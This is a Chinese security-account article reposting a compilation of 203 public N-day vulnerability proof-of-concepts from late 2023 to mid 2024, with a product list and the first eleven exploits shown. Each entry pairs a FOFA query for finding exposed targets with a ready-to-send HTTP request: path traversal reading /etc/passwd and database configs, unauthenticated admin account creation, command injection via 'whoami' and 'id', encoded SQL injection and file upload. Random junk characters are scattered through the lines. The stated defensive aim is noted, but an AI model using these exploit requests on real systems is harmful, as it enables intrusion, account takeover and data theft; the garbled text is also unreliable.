互联网公开漏洞整理202309-202406
; g8 K9 s) \# ^3 r( C9 @$ W4 ]道一安全 2024-06-05 07:41 北京: l1 u* t& O2 P4 x
以下文章来源于网络安全新视界 ,作者网络安全新视界( j- G- M0 R2 `; i6 c" Z6 T# W
: l% O9 S% M% I" n- ?& o7 A2 M
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。+ k# Y, ~) m9 k' J w& Q5 Z
) Z3 E4 }' a- \ J4 Q
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 R2 L9 X/ ^, p+ ?) o* d; c- W3 G V3 h% {- }, H9 G$ r
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
' |( n% A# z% y( Z- d' B
) C/ g6 C* z4 k0 x" Q文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。0 p! h0 I: ^2 w6 s
, T/ B0 \0 [# K) t5 G6 p9 K合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
4 F! f' X: v( {2 G, k0 a8 D$ F/ g" I# _. W" F
4 \# [* v* E3 q* ~! h2 v声明
( W q! V% ]# h/ L8 C% I9 }' J: b* F+ y6 v x( Y& i
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
$ ]: h1 o% f$ H" W/ ~* [3 v! o+ R+ s) D5 G p- j8 m# m3 J
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
$ l; X/ }: T8 q! V( Y6 Q- w8 s f) u8 I
- o5 S1 ^2 x& |& \/ @4 a/ ^! i: @8 H. A. u8 f7 `
目录" c( y! Z# K0 i$ \& n! X r
0 X, a+ h) Y0 a1 Y3 A5 l
017 H8 C% @$ J. F! s" o; E% v
( I/ P* t4 _' k5 H, K' x
1. StarRocks MPP数据库未授权访问
& f4 i; R& r' Y3 A$ \2. Casdoor系统static任意文件读取
_0 ?5 l" P1 E v3. EasyCVR智能边缘网关 userlist 信息泄漏
7 v4 i. E$ w( R+ Y$ V4. EasyCVR视频管理平台存在任意用户添加& b- ^' A# Y0 r3 a* \+ x( F6 l* f
5. NUUO NVR 视频存储管理设备远程命令执行
7 o2 F$ T6 E! X0 i) _3 y6. 深信服 NGAF 任意文件读取6 A9 i# D. W& i( |5 R
7. 鸿运主动安全监控云平台任意文件下载
/ h0 j; u; ~, [9 Z& ^8. 斐讯 Phicomm 路由器RCE# i, I9 ]! h* e7 o. @* P ]% q
9. 稻壳CMS keyword 未授权SQL注入
" D/ `4 H" E' ~6 k. v' A10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
! E# F+ B# U6 u/ A5 p11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* Q: P' J, ?8 S) g12. Jorani < 1.0.2 远程命令执行) T" |' ]) S1 p3 Q6 q% E
13. 红帆iOffice ioFileDown任意文件读取6 h) v# V4 Q4 @0 R
14. 华夏ERP(jshERP)敏感信息泄露. \3 i7 d0 E- L* ?
15. 华夏ERP getAllList信息泄露
7 N7 ^/ w) L/ I' ~4 z+ L# o. a16. 红帆HFOffice医微云SQL注入7 T4 M: P; X" i
17. 大华 DSS itcBulletin SQL 注入' E6 [) [( x [; n2 l4 m
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
* p# \# I1 W6 t8 J2 J8 l19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入# O9 J8 D. G1 s
20. 大华ICC智能物联综合管理平台任意文件读取
j) r5 O( W, M v21. 大华ICC智能物联综合管理平台random远程代码执行
/ ~4 L" d1 {# J# v& L9 P, C22. 大华ICC智能物联综合管理平台 log4j远程代码执行: \' O, w! V. b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
5 _5 p( Z& y1 s9 k) t! H24. 用友NC 6.5 accept.jsp任意文件上传/ `! [4 Q$ P, v, B
25. 用友NC registerServlet JNDI 远程代码执行
; ?* R" N: o; ]& A0 X' V: _* T9 B26. 用友NC linkVoucher SQL注入* q( K( L. R1 E& c q9 X! a
27. 用友 NC showcontent SQL注入
, e8 _& [" M+ ^! ~4 \3 F28. 用友NC grouptemplet 任意文件上传
" {9 {4 g. {- q29. 用友NC down/bill SQL注入& c# L8 Z* K/ I: t
30. 用友NC importPml SQL注入
: z# f J" q5 n2 j( z- S31. 用友NC runStateServlet SQL注入8 V6 Z" o! ]# m6 |6 `
32. 用友NC complainbilldetail SQL注入1 ? j! j. e+ [
33. 用友NC downTax/download SQL注入
! n9 G2 x, Z; Q7 j34. 用友NC warningDetailInfo接口SQL注入2 f5 ]4 F6 B. ^1 }2 y! v5 y5 b
35. 用友NC-Cloud importhttpscer任意文件上传7 _, ]9 J4 V5 ]- [6 A& k
36. 用友NC-Cloud soapFormat XXE' B; h8 p0 l& V* P t4 Z+ E
37. 用友NC-Cloud IUpdateService XXE0 A3 r4 t# l9 ]3 l$ n3 W
38. 用友U8 Cloud smartweb2.RPC.d XXE
$ \) @0 p& Z/ A% W" P39. 用友U8 Cloud RegisterServlet SQL注入
4 O0 D. w# g3 Y5 r* L40. 用友U8-Cloud XChangeServlet XXE7 L; B6 |! l& v
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 s, B2 O* R6 C3 t" G! i42. 用友GRP-U8 SmartUpload01 文件上传
6 y, `3 f M/ q1 C4 X1 S43. 用友GRP-U8 userInfoWeb SQL注入致RCE
0 Q7 b }$ ^# h5 R& g' f44. 用友GRP-U8 bx_dj_check.jsp SQL注入. d0 Q' Y' z4 J* |
45. 用友GRP-U8 ufgovbank XXE
. K' k! b0 o/ w7 J& B46. 用友GRP-U8 sqcxIndex.jsp SQL注入- y/ | P4 f, O' |0 ?3 n
47. 用友GRP A++Cloud 政府财务云 任意文件读取8 k( d& X" ?) }$ L( `
48. 用友U8 CRM swfupload 任意文件上传* q; U5 c( F' }! U( u
49. 用友U8 CRM系统uploadfile.php接口任意文件上传" ?3 Y1 B$ G0 L1 i9 E; X
50. QDocs Smart School 6.4.1 filterRecords SQL注入
4 e. N; H( ?6 i- s- V C. G51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" T( ], |) w: U2 c/ N/ s9 ]
52. 泛微E-Office json_common.php sql注入; s# v' s9 n) b: y
53. 迪普 DPTech VPN Service 任意文件上传
# E. O% e* I; s `$ t( M% B54. 畅捷通T+ getstorewarehousebystore 远程代码执行* o% ~: N% m& o# e0 q
55. 畅捷通T+ getdecallusers信息泄露
: O ^; m2 ^- E6 {* `- T$ N% l56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
; D/ P0 s) Y0 E( _57. 畅捷通T+ keyEdit.aspx SQL注入$ j u, [6 F& U6 I6 x- C3 V0 d% v- b
58. 畅捷通T+ KeyInfoList.aspx sql注入% x; S% N: _: M8 [
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行& q* ~) N8 R- z! i6 T
60. 百卓Smart管理平台 importexport.php SQL注入9 i: h8 z1 Q1 p/ ~& _ k* ?
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传1 c( M! X0 N& M) w! s( e) m5 H5 F
62. IP-guard WebServer 远程命令执行$ H7 Y4 q( k% A _4 V. B
63. IP-guard WebServer任意文件读取
( ]3 B. J$ D4 R) T, R$ u. r+ W64. 捷诚管理信息系统CWSFinanceCommon SQL注入2 ^+ w" _+ U4 S+ F0 Q
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
7 a/ z# g9 f! q( `; T$ s$ s$ G66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
# P+ q8 x* v, j* [$ n67. 万户ezOFFICE wpsservlet任意文件上传+ W) U( ~* ]. G0 f
68. 万户ezOFFICE wf_printnum.jsp SQL注入
1 c6 ^9 Q$ x; p5 m69. 万户 ezOFFICE contract_gd.jsp SQL注入! c, Y9 n* ?7 R& `6 H
70. 万户ezEIP success 命令执行
. k. r* W. r( ^4 w71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
( d6 z: s- T+ _4 B$ {8 G72. 致远OA getAjaxDataServlet XXE. c! A: D4 \3 @8 Q [3 ~( g
73. GeoServer wms远程代码执行) W, D, D9 y* f/ e% k& X
74. 致远M3-server 6_1sp1 反序列化RCE8 W( p. c( i5 j: D+ \( h
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- I( j" E n$ ?76. 新开普掌上校园服务管理平台service.action远程命令执行
! U1 Q2 T4 @. h- p- C0 @- f77. F22服装管理软件系统UploadHandler.ashx任意文件上传
8 V2 H/ \/ `, y+ `# ^, S. o78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
/ {, Y- I4 V* o79. BYTEVALUE 百为流控路由器远程命令执行1 J2 o$ T1 f) @- m/ G+ [
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
8 d) m/ S% Q$ Y7 L9 [( D+ E81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
' d0 p4 M! B2 C$ J82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
8 X8 h- k8 O; r: j) X83. JeecgBoot testConnection 远程命令执行
* V. y- y9 i$ S6 u% d: u! Z84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# t) r) A; h0 D: H4 f: T
85. SysAid On-premise< 23.3.36远程代码执行
4 P8 ^& }" ]1 \0 g) W' M+ ^8 S4 I86. 日本tosei自助洗衣机RCE4 W# e. D+ B" u" y
87. 安恒明御安全网关aaa_local_web_preview文件上传7 ?; V3 |. N. U, s3 S( ?3 T
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行 M6 K0 ] R* H+ i2 ^8 w3 b
89. 致远互联FE协作办公平台editflow_manager存在sql注入. O- V& @6 }0 o6 `5 f
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行% S- Q5 M$ @, h8 D) M$ i
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
$ Z; j# p$ Z, |% [! W/ g2 \' x92. 海康威视运行管理中心session命令执行
7 ]3 `( i* V; g( M( x93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
+ J3 i+ R c( D+ d4 W( q94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传: M; }* `) @) B3 j6 ^9 ?3 b% L& r
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行' w9 G" p3 X M! [
96. Apache OFBiz 18.12.11 groovy 远程代码执行
6 ~; p" N, F; U97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
1 X( B/ g5 O. g0 A98. SpiderFlow爬虫平台远程命令执行
7 J' u1 V1 ?1 t9 k( I a99. Ncast盈可视高清智能录播系统busiFacade RCE
; M$ x! e& r( Z* D6 ~7 M100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
" S4 u( G! O/ o101. ivanti policy secure-22.6命令注入$ e2 y7 ^3 r* u2 C2 ~5 e
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行* n. k0 K9 f* {% X
103. Ivanti Pulse Connect Secure VPN XXE
' r. ^. s. m% |# n104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露+ c4 y" I) ^5 Z# w; h) q5 N+ S' z: }
105. SpringBlade v3.2.0 export-user SQL 注入* s2 ^0 |" q. Y' ?- l/ s
106. SpringBlade dict-biz/list SQL 注入- p4 U3 u1 y: w+ W- N' i9 a# o4 l
107. SpringBlade tenant/list SQL 注入
2 z% J) b: L7 b! o, y, {- y% ]108. D-Tale 3.9.0 SSRF+ ]# K5 x: h9 m" R$ ?& K
109. Jenkins CLI 任意文件读取- {. W7 r- i6 k5 J$ A
110. Goanywhere MFT 未授权创建管理员
6 L( K6 N% C. S8 m7 v111. WordPress Plugin HTML5 Video Player SQL注入
% E5 v4 ?/ ?% n) Q Y6 I5 P# ~112. WordPress Plugin NotificationX SQL 注入
1 K% Z2 X0 u, Z0 `113. WordPress Automatic 插件任意文件下载和SSRF9 @1 @9 v3 b- O0 j
114. WordPress MasterStudy LMS插件 SQL注入: v, v# q. X& n
115. WordPress Bricks Builder <= 1.9.6 RCE
; p# K0 T( v) O! i116. wordpress js-support-ticket文件上传
6 X( j0 L7 N. H( A7 w# x" e% f$ v117. WordPress LayerSlider插件SQL注入# w" R( e; W; |+ o! k
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
( z' I2 y$ A/ O0 ?& s119. 北京百绰智能S20后台sysmanageajax.php sql注入
! G" R' Q( v: a6 E/ A* N/ C2 W120. 北京百绰智能S40管理平台导入web.php任意文件上传
( I* ` e! }, ]+ K* E( X/ T121. 北京百绰智能S42管理平台userattestation.php任意文件上传
2 m6 @& w1 k M7 l122. 北京百绰智能s200管理平台/importexport.php sql注入: U' w' n1 g+ ]
123. Atlassian Confluence 模板注入代码执行
: _- T. P' \( v$ s) R124. 湖南建研工程质量检测系统任意文件上传
4 t5 L" e% F: h8 X125. ConnectWise ScreenConnect身份验证绕过
7 ]! m9 ^9 X5 s: f126. Aiohttp 路径遍历
- W8 {* [) |$ s. G5 Q! t1 q127. 广联达Linkworks DataExchange.ashx XXE. F, d6 Z, t# R0 ~
128. Adobe ColdFusion 反序列化
4 ?* Q8 ?$ h$ e: z/ k129. Adobe ColdFusion 任意文件读取" X* g" B& B* r7 F' z
130. Laykefu客服系统任意文件上传! O6 R2 ?" h4 a( i6 P
131. Mini-Tmall <=20231017 SQL注入
' m) x1 S. j. t% h) a0 A132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
7 |. a& e$ K& _133. H5 云商城 file.php 文件上传
9 _* r6 @ I5 f6 P* h( h3 [134. 网康NS-ASG应用安全网关index.php sql注入
+ M) l" @* X: n4 V& S135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入$ C' u0 }. @2 \4 h
136. NextChat cors SSRF5 g4 [. j) |1 x
137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 R3 H* _$ C( V* P' H138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
, F6 d n5 |8 [4 c; K0 t* F" @/ {139. 福建科立讯通信指挥调度平台editemedia.php sql注入
$ Y/ H. b* ~/ M% c9 z140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
- o" n# x4 V/ e- }2 `! ~: T141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入# M, q5 c* I3 Z0 [9 p
142. CMSV6车辆监控平台系统中存在弱密码! u, h+ d, _1 d
143. Netis WF2780 v2.1.40144 远程命令执行
* D1 C+ x' h/ S; j( w3 E4 B& u144. D-Link nas_sharing.cgi 命令注入* K, R1 D8 ?0 i: N0 B, p+ j% T5 l8 E
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入# s- X, f. q# w, E* @1 \/ z
146. MajorDoMo thumb.php 未授权远程代码执行
# L( ?# o. U# H147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
$ ~/ F1 P; J' T5 H1 C7 L148. CrushFTP 认证绕过模板注入# H6 t/ f8 z* @* x
149. AJ-Report开源数据大屏存在远程命令执行
4 V6 s. `' M& R, I/ B; ~; Q* b {+ V150. AJ-Report 1.4.0 认证绕过与远程代码执行
, A$ ~$ U5 L" J/ \151. AJ-Report 1.4.1 pageList sql注入3 ?. ?* |7 m+ M1 y1 S
152. Progress Kemp LoadMaster 远程命令执行
* E' ?# o1 [2 W& {153. gradio任意文件读取
8 S: f4 W. q/ W& U2 Y3 y154. 天维尔消防救援作战调度平台 SQL注入
$ r& G- I. w) H155. 六零导航页 file.php 任意文件上传
. I5 I! g0 v- U* j- f! N1 C156. TBK DVR-4104/DVR-4216 操作系统命令注入
, `" W$ n! [" l" } G2 l) M. P( X; F157. 美特CRM upload.jsp 任意文件上传2 Q- I, F, w* {& g: H
158. Mura-CMS-processAsyncObject存在SQL注入. a7 _5 S. ]9 k( |9 n: ?
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传2 f& U5 W/ J2 V
160. Sonatype Nexus Repository 3目录遍历与文件读取1 `7 G& D; ^6 V5 V7 h
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
5 b1 }% }7 A& u4 F# d+ S: B, _162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
- j" J A% F& B8 W u2 ^7 A2 Z163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 o A, U& s1 ~; [# m6 V
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传) `' f, l) f! G( _2 b c4 x+ X! x
165. OrangeHRM 3.3.3 SQL 注入
; Z, d7 {- t9 |* W1 d2 ^166. 中成科信票务管理平台SeatMapHandler SQL注入
: N7 M( ?8 `4 F9 R- e( v' B7 d167. 精益价值管理系统 DownLoad.aspx任意文件读取2 ~2 W6 U; N: T0 b5 z/ k4 U
168. 宏景EHR OutputCode 任意文件读取* Y; B" F6 k0 o3 O7 w
169. 宏景EHR downlawbase SQL注入& \0 M7 b: h' S' ]- a' {, i$ y( R
170. 宏景EHR DisplayExcelCustomReport 任意文件读取. z6 u, B, { F L8 `: z( L
171. 通天星CMSV6车载定位监控平台 SQL注入! N* C4 H" F6 H2 l
172. DT-高清车牌识别摄像机任意文件读取! A: v4 S- I/ s' E" G& _
173. Check Point 安全网关任意文件读取
) S% b9 d! y4 Z. i$ u174. 金和OA C6 FileDownLoad.aspx 任意文件读取
6 Z6 G8 q* z, f! x175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入" h" G2 y' l( o- c; W6 M
176. 电信网关配置管理系统 rewrite.php 文件上传0 T" U5 ?/ p9 F( S
177. H3C路由器敏感信息泄露' F) a# P l! j, X
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
- ?0 T9 ~! Y6 u$ {/ R6 w. E179. 建文工程管理系统存在任意文件读取0 y. d! l3 @' Q+ w
180. 帮管客 CRM jiliyu SQL注入% v1 a4 }4 ^) V3 i/ T- N9 I4 Y
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入( N& O1 i5 Y9 k! u
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
6 `5 C, \ U; t) e- I h- C183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入1 F+ @+ I- ?: B- U# x
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
; T, y! r( ?0 K185. 瑞友天翼应用虚拟化系统SQL注入2 o1 R, ~* c! l0 h3 h" u1 t
186. F-logic DataCube3 SQL注入6 E- W0 }% V/ K- G
187. Mura CMS processAsyncObject SQL注入
+ x9 I! D" {- X3 q [! A' p188. 叁体-佳会视频会议 attachment 任意文件读取 {* g. l7 v3 c' k' `2 i: n$ l0 z/ v
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: ?% ?& x8 B3 ?6 H" `& Q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
* H! q$ \# G w4 [191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
( e2 } r$ W) h; N192. 富通天下外贸ERP UploadEmailAttr 任意文件上传- _! M. R! l% w, Y1 a# G
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行, T8 J5 }1 o" M+ _# ]7 s
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传, Z8 b, M% L1 t, q% f
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行 b- a, p+ f. y/ Q) @0 c( ^; ~4 l' `
196. 河南省风速科技统一认证平台密码重置& A$ T4 \7 L! V, o9 ?
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入" l* ^/ O3 ^- t
198. 阿里云盘 WebDAV 命令注入
6 q6 y5 v/ R* g, ~1 n% L199. cockpit系统assetsmanager_upload接口 文件上传: h2 z' V' z- q {7 k, i5 x
200. SeaCMS海洋影视管理系统dmku SQL注入* z. v1 ~2 ]9 w6 M3 H- d/ a
201. 方正全媒体新闻采编系统 binary SQL注入
3 s7 d% n0 b. W202. 微擎系统 AccountEdit任意文件上传
7 o, Q: \6 ?& s2 n203. 红海云EHR PtFjk 文件上传
( }% N% f% o$ Z( G( F) X5 T2 R7 }% g, F, ^
POC列表2 v1 r1 j( x b7 d0 o
1 s9 A' o4 w4 k5 c9 p m6 H; g027 m: D% e o6 q
4 V& T* G, M/ p7 O1. StarRocks MPP数据库未授权访问+ D3 g J |# f/ c- `5 M
FOFA :title="StarRocks"
" l* O- P# S( F* y2 YGET /mem_tracker HTTP/1.1
8 K8 Y9 C* S1 \7 V8 }3 yHost: URL
( ~$ {2 z1 e' ^+ O5 ^; j9 X
. b; W& B, O2 `1 R
2 Q, ~ z. d, [2 `: S5 T2. Casdoor系统static任意文件读取
4 _9 }$ W6 T; F. `2 Q# BFOFA :title="Casdoor"# a& P9 `+ _$ a4 o; F7 b
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1* w/ n1 B* l; ]2 n
Host: xx.xx.xx.xx:9999
* o7 S% n6 J+ w- wUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
8 I( e! E7 g8 wConnection: close% O/ u9 H1 M; x C
Accept: */*
+ X- n8 c" M4 Y, X$ B, JAccept-Language: en
# M4 R$ g; ^4 \& GAccept-Encoding: gzip
" r% ^/ U4 @2 V, P S |- _' C6 @4 `2 q- U
1 z& p0 Y8 ^0 }: I. K& W
3. EasyCVR智能边缘网关 userlist 信息泄漏+ d ~) v# W/ |8 T" |7 i
FOFA :title="EasyCVR"% Q2 \. f5 s; j* C" N$ U# V
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
" a# Q! g' m& C2 V9 p2 pHost: xx.xx.xx.xx4 d( H, t: Y4 q! B# E
. o/ s+ ]; z+ ]! w" ^) K; r
3 R; t: c2 V+ n; P# i4. EasyCVR视频管理平台存在任意用户添加! ]$ Y& t7 E$ A- ?8 f7 A) \
FOFA :title="EasyCVR"* L8 P. S6 d( X1 h: ~1 k
% O" P; O7 E$ T8 w+ Opassword更改为自己的密码md5
" G) x; W; G0 M( s7 q/ D& K. OPOST /api/v1/adduser HTTP/1.1
L0 p2 ^- ?/ |* |Host: your-ip
- H0 N0 K% U) i! lContent-Type: application/x-www-form-urlencoded; charset=UTF-89 |! A3 V" \' O; e- m' Z
" K1 P! V; j% f B, } X% Hname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1( {8 T8 ?8 _( P
5 [: U% G. U& J
+ a' s9 W, P* R! G. D6 ^
5. NUUO NVR 视频存储管理设备远程命令执行+ f& I/ y7 O) ]' t! T4 N
FOFA:title="Network Video Recorder Login"
. b" `9 D( w. |GET /__debugging_center_utils___.php?log=;whoami HTTP/1.10 f* a; q- l$ H# x0 k
Host: xx.xx.xx.xx- P4 U" z+ R& @
; [% C' v* j5 D+ ^. L+ c6 J! Y9 r0 T" p' V
6. 深信服 NGAF 任意文件读取, S T \- g" B) h( d
FOFA:title="SANGFOR | NGAF"3 `1 r* o' U$ D. I1 z0 F
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
9 N+ B8 g6 o8 z: F X+ _) c5 {Host:
5 F0 Z) Q7 J) h$ V4 |$ ?+ b
" h+ ~9 c& g' O% C# _' E( Q* D& _
7 U& K1 _9 k2 v d8 m7. 鸿运主动安全监控云平台任意文件下载4 s" P. n1 M: j9 [1 s# Q
FOFA:body="./open/webApi.html"/ n5 F1 C* ~8 A/ \
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 }4 S* W; l& w& p$ A
Host:/ B; S5 n5 A# m$ ?% a9 C2 L
. i% T- S5 ^1 v; F4 Y+ b
! r8 U3 a+ j6 @9 z( Z8. 斐讯 Phicomm 路由器RCE
* [7 m0 V' f E: p6 cFOFA:icon_hash="-1344736688", _- Z. f$ M( `) f, b
默认账号admin登录后台后,执行操作
/ p+ m! V, v+ ]- k7 X! c7 ePOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1' ~# l. ~$ `5 C7 ]
Host: x.x.x.x7 a: g t0 s! a
Cookie: sysauth=第一步登录获取的cookie2 W1 s3 w9 z' k$ m {, P2 {& L! k/ ]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
' R8 m1 K( v, }" `+ W" j5 xUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36+ O9 E3 @! O! g
8 }! p7 U+ ]8 @' H* u, ]+ B------WebKitFormBoundaryxbgjoytz
# D, w( t8 B# ]7 ?5 G. NContent-Disposition: form-data; name="wifiRebootEnablestatus"
3 a! G% |# r) U( k3 |7 W8 ?: R
% |" U) p/ h" G* k%s' u$ H d8 d* R5 ^2 h, Z6 q& A4 L
------WebKitFormBoundaryxbgjoytz
( [/ z4 L6 E/ ~) GContent-Disposition: form-data; name="wifiRebootrange"+ V: t6 p. h, U3 \/ _
2 W& j+ c% J" K8 N' T" M
12:00; id;+ o/ }) E7 o: x8 z5 z
------WebKitFormBoundaryxbgjoytz
' |; @6 ~5 K& ]0 \+ Z% p5 y# dContent-Disposition: form-data; name="wifiRebootendrange"8 t1 H- k# U$ S! R v9 B: d& ~% @
8 j/ ]$ x" O. L0 K4 M
%s:9 `6 h Y, R: |7 {* }
------WebKitFormBoundaryxbgjoytz
4 K4 z, n6 d# O/ J8 A6 kContent-Disposition: form-data; name="cururl2"
" ?3 A8 e+ H/ l) ]2 x" Q* W; e5 U) `( x; {+ m" j
2 P# D( ~, y# H) @9 i9 B------WebKitFormBoundaryxbgjoytz--
! K4 Q! A1 q V! }- N- S! }5 T8 J' g4 r$ F* p. C `
7 H# o, n4 G& O
9. 稻壳CMS keyword 未授权SQL注入
; O' k N, p7 f, W# T, LFOFA:app="Doccms"* u6 V9 o Y0 m9 \ A _% l
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1, b4 p4 \3 j4 O/ ~& g
Host: x.x.x.x
1 H7 I' D" X- Y5 m( \. U. O
1 p1 A) b- h) E, z3 L: M' D0 X3 ~, F9 a
payload为下列语句的二次Url编码 i. l% q" F5 ]. t+ D7 k
* T, B( N+ a% P' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
/ f, A0 C( _* D7 }: z
1 r" h+ H7 l- h' c10. 蓝凌EIS智慧协同平台api.aspx任意文件上传, X2 l8 L4 O5 O. L
FOFA:icon_hash="953405444"( m+ E# J6 e; J/ ?
& H: c3 `2 L# b' _. S3 v
文件上传后响应中包含上传文件的路径# B1 J/ Q9 M, j& P
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
/ p# O; Z3 H/ R* F |: e# n: DHost: x.x.x.x:xx! V/ h5 W& {0 j" Q. X9 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36% H3 b: b3 T2 J1 R; d2 D
Content-Length: 197
- _# n# G: y' M% B; x2 _) R! aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
3 i- A* M8 O4 L3 fAccept-Encoding: gzip, deflate
/ `% O7 n; `7 k) {+ ?. d( [Accept-Language: zh-CN,zh;q=0.9
8 z- ?1 m" k. o+ c: R8 T" m* DConnection: close
) G* L' v" [, g2 v" y; IContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu+ L5 y+ O* k$ d" a' T# S% T
5 L$ u0 |% }2 o* X q------WebKitFormBoundaryxdgaqmqu0 a+ f; a4 k9 u! P% ]
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
; o9 N9 C2 U% F) O7 _* z" ]+ \/ j! ^6 rContent-Type: text/html. m4 x3 F: r* x: |
7 k- {- N' B$ o. f- V& gjmnqjfdsupxgfidopeixbgsxbf5 h& e0 P* z5 L* W. j6 n
------WebKitFormBoundaryxdgaqmqu--7 {* q1 _& j8 O! o2 L" A+ n
( \* O K* K1 M; {
8 K7 j% {0 I/ G8 D1 B* q$ r4 e+ Y11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
! U+ z' j- i- T* p5 bFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
3 S6 B7 `5 I- }. A: G* DGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.16 R4 N9 M/ u9 c; q
Host: 127.0.0.1
" r, \! W0 k& v5 D$ G/ m8 m: ]Pragma: no-cache
% c" U( D9 o# W7 u) J) Y0 {0 D; }Cache-Control: no-cache
5 [6 M9 E* b- q- @Upgrade-Insecure-Requests: 1
